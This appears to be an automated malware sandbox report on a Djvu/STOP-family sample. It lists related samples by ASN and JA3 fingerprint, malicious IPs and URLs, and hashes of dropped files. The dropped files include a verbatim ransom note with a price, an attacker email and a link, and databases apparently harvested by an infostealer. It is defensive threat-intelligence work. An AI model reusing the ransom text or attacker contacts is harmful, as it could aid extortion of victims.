	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse	196.188.169.138

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	https://www.erhealthplans.com/RKduHZzY/d?url=pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZ#pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZMAYYY2hyaXN0aWUuYmFlejFAc3NzcHIuY29t	Get hash	malicious	Unknown	Browse	51.222.239.232
	4XiBSHVMK9.exe	Get hash	malicious	FormBook	Browse	51.83.226.243
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader	Browse	51.255.152.132
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	51.255.152.132
	PO22_A4031B-HS2309-[HS4B].vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	144.217.159.195
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	51.255.152.132
	arm7.elf	Get hash	malicious	Mirai	Browse	91.121.98.236
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	51.255.152.132
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	51.255.152.132
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	51.255.152.132
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	51.255.152.132
	x7RlIzQDk1.exe	Get hash	malicious	Unknown	Browse	192.99.226.184
	nBSpAVT2BR.exe	Get hash	malicious	GuLoader, Remcos	Browse	54.37.178.173
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	51.255.152.132
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	51.255.152.132
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader, Vidar, Xmrig	Browse	51.255.152.132
	GMUDTQ4Ggf.exe	Get hash	malicious	Amadey, DanaBot, SmokeLoader	Browse	37.59.205.1
	SEM_Gumpertz202201210-347.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	144.217.159.195
	LRPgTfMdnR.exe	Get hash	malicious	GuLoader	Browse	5.135.12.126
	YLtPLmq2O1.exe	Get hash	malicious	Amadey, DanaBot, SmokeLoader	Browse	37.59.205.1
ATGS-MMD-ASUS	https://www.erhealthplans.com/RKduHZzY/d?url=pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZ#pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZMAYYY2hyaXN0aWUuYmFlejFAc3NzcHIuY29t	Get hash	malicious	Unknown	Browse	34.160.158.95
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, SmokeLoader	Browse	34.143.166.163
	trLAvukD5q.elf	Get hash	malicious	Mirai	Browse	34.7.125.147
	GnV3mIBVzc.elf	Get hash	malicious	Unknown	Browse	48.215.67.85
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	34.143.166.163
	Secret_file.one	Get hash	malicious	Unknown	Browse	34.159.33.139
	arm7.elf	Get hash	malicious	Mirai	Browse	51.166.63.52
	x86.elf	Get hash	malicious	Unknown	Browse	51.167.236.111
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	34.143.166.163
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	34.143.166.163
	http://url7886.code-labs.com/ls/click?upn=8LXZlWK2bambre6KWCxdOCzQ9ovxKiTD066QMKIl4erxMTBlNsp2qi68FS1OnJvZaAi8-2FIcZblZiqF2ke65v77-2Fdj9BO5FOdwAv6rN88PhA-3DA60K_Rp0pmxejnGmszPuIbhmoSax5KHvmLIATL3ua8Xmg9cxFSOOluTILR7ymNT-2FJa99cI34r3Yp8A1Xe7syKAc-2FEbYcJH6ewLw-2FpcXuOWzd2OwRbj9mrAjOr9R8hcp1-2FazfV8Jl2OWq3OoN4dNJQtLSxK1z47oYfx67WJDJNqfUELlnUxguQeuTCeKqkuTSz0MgADG3SgxE5mmG0XF-2FZ22IHcWbZdKKo8Bncfp356nWNqMOBNdprKYlJA1AowvA9ZkjMCcNrjKiLZztj-2B3hUcXhZvFFafFQe4QhKwCAcXoORBBAwVjszBUpyNoWsqk5lu-2Bo9xuMzyg4Bs0bjqHKBa49nZztHkstCIjXpqdgykIcs-2FfvR8QcS6Q5UhdpCB0dJsN-2BSsUzZkUtKvE10PjAObnykCit3n64HsoG3WpkcZYRIOKjpmV75DKvLgiTqlWwWShX4&c=E,1,ZenN7WIAWKTeATPbdYwAGW2wkI_w5hWQ5KdzfFg8raDBCN2tDfMNpi8Til0TMuHf1RFW_c07OA4wqI_v-NlHYgNgSYOyDW9RffnlT6vkMIkJ8itQST4,&typo=1	Get hash	malicious	Unknown	Browse	34.36.213.229
	http://url7886.code-labs.com/ls/click?upn=8LXZlWK2bambre6KWCxdOCzQ9ovxKiTD066QMKIl4erxMTBlNsp2qi68FS1OnJvZaAi8-2FIcZblZiqF2ke65v77-2Fdj9BO5FOdwAv6rN88PhA-3DA60K_Rp0pmxejnGmszPuIbhmoSax5KHvmLIATL3ua8Xmg9cxFSOOluTILR7ymNT-2FJa99cI34r3Yp8A1Xe7syKAc-2FEbYcJH6ewLw-2FpcXuOWzd2OwRbj9mrAjOr9R8hcp1-2FazfV8Jl2OWq3OoN4dNJQtLSxK1z47oYfx67WJDJNqfUELlnUxguQeuTCeKqkuTSz0MgADG3SgxE5mmG0XF-2FZ22IHcWbZdKKo8Bncfp356nWNqMOBNdprKYlJA1AowvA9ZkjMCcNrjKiLZztj-2B3hUcXhZvFFafFQe4QhKwCAcXoORBBAwVjszBUpyNoWsqk5lu-2Bo9xuMzyg4Bs0bjqHKBa49nZztHkstCIjXpqdgykIcs-2FfvR8QcS6Q5UhdpCB0dJsN-2BSsUzZkUtKvE10PjAObnykCit3n64HsoG3WpkcZYRIOKjpmV75DKvLgiTqlWwWShX4&c=E,1,ZenN7WIAWKTeATPbdYwAGW2wkI_w5hWQ5KdzfFg8raDBCN2tDfMNpi8Til0TMuHf1RFW_c07OA4wqI_v-NlHYgNgSYOyDW9RffnlT6vkMIkJ8itQST4,&typo=1	Get hash	malicious	Unknown	Browse	34.149.155.70
	x7RlIzQDk1.exe	Get hash	malicious	Unknown	Browse	34.174.61.199
	XLT0090008000000.bat.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	34.143.166.163
	CMO4VDTx2J.exe	Get hash	malicious	Unknown	Browse	34.29.71.138

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	PrivateLoader	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	voicemail.html	Get hash	malicious	Unknown	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	Print_data_20231012_678486_994044.js	Get hash	malicious	Unknown	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	Print_data_20231012_678486_994044.js	Get hash	malicious	Unknown	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, SmokeLoader	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	wgdE3POxOg.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	W7z1Z5tra2.exe	Get hash	malicious	RedLine, WSHRAT	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	ioMJg2xHZQ.exe	Get hash	malicious	Babuk, Djvu, RedLine, SmokeLoader	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	file.exe	Get hash	malicious	RisePro Stealer	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	Inquiry[2023.10.11_08-07].vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	DOCUMENT[2023.10.11_08-07]_2.vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	Document[2023.10.11_08-07]_1.vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	information[2023.10.11_08-07]_2.vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	Document[2023.10.11_08-07].vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	INFORMATION[2023.10.11_08-07]_1.vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	information[2023.10.11_08-07].vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	document[2023.10.11_08-07]_6.vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
	Document[2023.10.11_08-07]_5.vbs	Get hash	malicious	IcedID	Browse	91.215.85.209 213.6.54.58 172.67.213.185 172.67.196.133
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	PrivateLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	magic.js	Get hash	malicious	Unknown	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	magic.js	Get hash	malicious	Unknown	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	PO22_A4031B-HS2309-[HS4B].vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	QKWNuQXWLD.exe	Get hash	malicious	Unknown	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	QKWNuQXWLD.exe	Get hash	malicious	Unknown	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, SmokeLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	wgdE3POxOg.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	3Xie77C42Q.exe	Get hash	malicious	Upatre	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	Certificado FNMT.exe	Get hash	malicious	GuLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	bPYR660y5o.exe	Get hash	malicious	Azorult, GuLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	ioMJg2xHZQ.exe	Get hash	malicious	Babuk, Djvu, RedLine, SmokeLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	SEM_Gumpertz202201210-347.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	Notificaci#U00f3n-AEAT.exe	Get hash	malicious	GuLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	Update.js	Get hash	malicious	Unknown	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	kDTGTVIHAr.exe	Get hash	malicious	Unknown	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	EXTRATO_COMBINADO.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	Payment_Copy.pdf.js	Get hash	malicious	WSHRAT	Browse	172.67.139.220 45.130.41.106 149.154.167.99
	Justificante_de_pago.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.139.220 45.130.41.106 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse
	E89IeuS2H1.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse
	wgdE3POxOg.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Djvu, RedLine, SmokeLoader, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse
	1d591987233fea8f0cf1046ad2052645201a8ebbd788b3db04960e75.exe	Get hash	malicious	Vidar	Browse
	336ecdd5f5c040f5d3fa238ae4b4813ebc48401500d2dfad0604fa9f.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader, Stealc	Browse

Created / dropped Files

(copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85989416740232
Encrypted:	false
SSDEEP:	24:ja8UJOvlGGZxPm+WOpheZHOsKUjVRyschThuslGcOevahdUBT6cCK4TQXSxEzEbH:u7KlGIhZWOphSuuONh9ccO4ahOBMTQS1
MD5:	62D39A7B64CCE12C8C7AB4FB36D53248
SHA1:	87234E6ADF05C3384962AC6805F564041F9AB256
SHA-256:	AFA1EE837E2B687A39BB6FA52394BA6431C466868106073887DB83368B7BDBF2
SHA-512:	E33967D5E32217030EA272165A24F38FE589C80B013B60B9740E5FE4CC6F6B66530822BD4175B92BDABD7FAED2C30BBF16BBBBC865B5C88D04C8787EBA458101
Malicious:	false
Preview:	BJZFP....:...QDUG4X...8..\|..oE.Y........3......aDE....]<...M....,...y.ZTC...8._......d...Jht.p6As.;..j.x..}.^n...,_xN..B..\Rp."....c..^^....0..\|t...O......T.%........B.K...0sz.L.?(+...[........q...xe^5......&......!A....k...(.nDo.!..S.b...0.............sU)..E C....lJ...!..L}.....k`....J8b......)..@....+{.)2. 4.T..-WEl...!,H..)x2.Q.X.....2...A......C.....+.N.x.eV....N.(Uz..,~.c...Ui.u1&8..>!..._u...a...=x...I...n.$..N.?F.w.......~.......h....p..nX...^..9.....Z.sl.%...,.....pa.xY.oS....n....)....y..^..=[..U.......>......\|.2./.S.....!C....S....@...s.h.:.B....c..R. ......Y.0A.....{9..]x..E..-._4.q.-.2\..X.%.\z.....KO.Gte.N..............;^1....`..... 2....HG...=%..^Q.U...mH.."k.s.o.!.g.v..#....l...............9.....(3>.'.`.ht{....G}\|t..9......;.:...t>%..1Z.uj.......}..V,....t.5{......5.K.I......:9T..9..Vp.YF...W..]5f>...3....H...I..WTA)P......&P.0Pq<;Ka.b...IY.<.ZF...u.W....ds.g3.I..m.S.D.3......C...?.x..8../7...NI.....8.yH..8.

C:\$WinREAgent\Scratch\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	4.874792337269828
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWyrmFRqrl3W4kA+GT/kF5M2/kLw3KTJRybGQ:WZHfv0p6WyrPFWrDGT0f/krbybH
MD5:	0FD2F9DEF16C2AB15CA8232B3081E019
SHA1:	B8AD094FFBB141352F626DB0A9ED02BACEE05EB0
SHA-256:	B3469C3CDE8A6898506ED59E26B302D21564F2361E02C23590672A7611253B4B
SHA-512:	58B072E055DB27A65AAB2117274541D64EC8847881F8DEC1A280BA8C597D87A4D80DF473403A628CCA1AB1BB9E635D9B35DE724C5E82F3DC381BE37870C110A8
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-xN3VuzQl0a..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address

C:\$WinREAgent\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	4.874792337269828
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWyrmFRqrl3W4kA+GT/kF5M2/kLw3KTJRybGQ:WZHfv0p6WyrPFWrDGT0f/krbybH
MD5:	0FD2F9DEF16C2AB15CA8232B3081E019
SHA1:	B8AD094FFBB141352F626DB0A9ED02BACEE05EB0
SHA-256:	B3469C3CDE8A6898506ED59E26B302D21564F2361E02C23590672A7611253B4B
SHA-512:	58B072E055DB27A65AAB2117274541D64EC8847881F8DEC1A280BA8C597D87A4D80DF473403A628CCA1AB1BB9E635D9B35DE724C5E82F3DC381BE37870C110A8
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-xN3VuzQl0a..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address

C:\ProgramData\10247093953745257185260554

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\23675264180045424164152672

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\27480204658061934855839416

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\30203308322283757404073061

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\30203308322283757404073061-shm

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\30501446544990741062517257

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\30708571578249241240933333

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\37366885513178414861811743

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\41709112032891024502836761

Download File

